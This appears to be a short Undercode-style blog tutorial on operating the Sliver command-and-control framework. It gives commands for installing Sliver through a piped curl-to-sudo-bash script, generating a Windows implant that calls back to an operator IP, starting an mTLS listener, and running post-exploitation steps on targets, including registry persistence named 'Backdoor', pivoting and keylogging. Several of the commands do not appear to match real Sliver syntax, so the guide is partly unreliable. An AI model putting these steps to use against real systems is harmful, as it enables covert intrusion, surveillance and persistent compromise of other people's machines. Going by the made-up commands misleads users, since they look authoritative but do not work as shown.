Intro to C2 Operations with Sliver

Featured Image
Sliver is a powerful Command and Control (C2) framework used in penetration testing and red teaming. If you’re new to C2 operations, this guide will help you understand Sliver’s basics, including setup, commands, and practical usage.

Getting Started with Sliver

Installation

Sliver supports multiple platforms (Linux, Windows, macOS). Here’s how to install it on Linux:

 Install dependencies 
sudo apt update && sudo apt install -y mingw-w64 binutils-multiarch

Download and install Sliver 
curl https://sliver.sh/install | sudo bash 

Starting the Server

Run the Sliver server:

sliver-server 

Generating Implants (Payloads)

Create a payload for a target system:

generate --mtls <YOUR_IP> --os windows --arch amd64 --save /tmp/win_sliver.exe 

Listener Setup

Start an mTLS listener:

mtls --lport 8443 

You Should Know: Essential Sliver Commands

Basic C2 Operations

1. List Active Sessions

sessions 

2. Interact with a Session

use <SESSION_ID> 

3. Execute Commands on Target

execute --command "whoami" 

4. Upload/Download Files

upload /local/file.txt C:\Windows\Temp\file.txt 
download C:\Windows\Temp\file.txt /local/downloaded.txt 

5. Persistence Techniques

persistence --method registry --name "Backdoor" 

Advanced Post-Exploitation

  • Privilege Escalation Checks
    run-executable --process winPEAS.bat 
    

  • Lateral Movement

    pivoting start --bind 0.0.0.0:4444 
    

  • Keylogging

    keylogger start 
    

What Undercode Say

Sliver is a versatile C2 framework that simplifies red team operations. Mastering it requires hands-on practice with implants, listeners, and post-exploitation modules. Always use Sliver ethically in authorized engagements.

Expected Output:

A functional C2 setup with active implants, allowing remote command execution, file transfers, and persistence.

Prediction

As C2 frameworks evolve, Sliver may integrate more evasion techniques and AI-driven automation, making it a preferred choice for red teams.

Reference:

References:

Reported By: Matthew Y – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram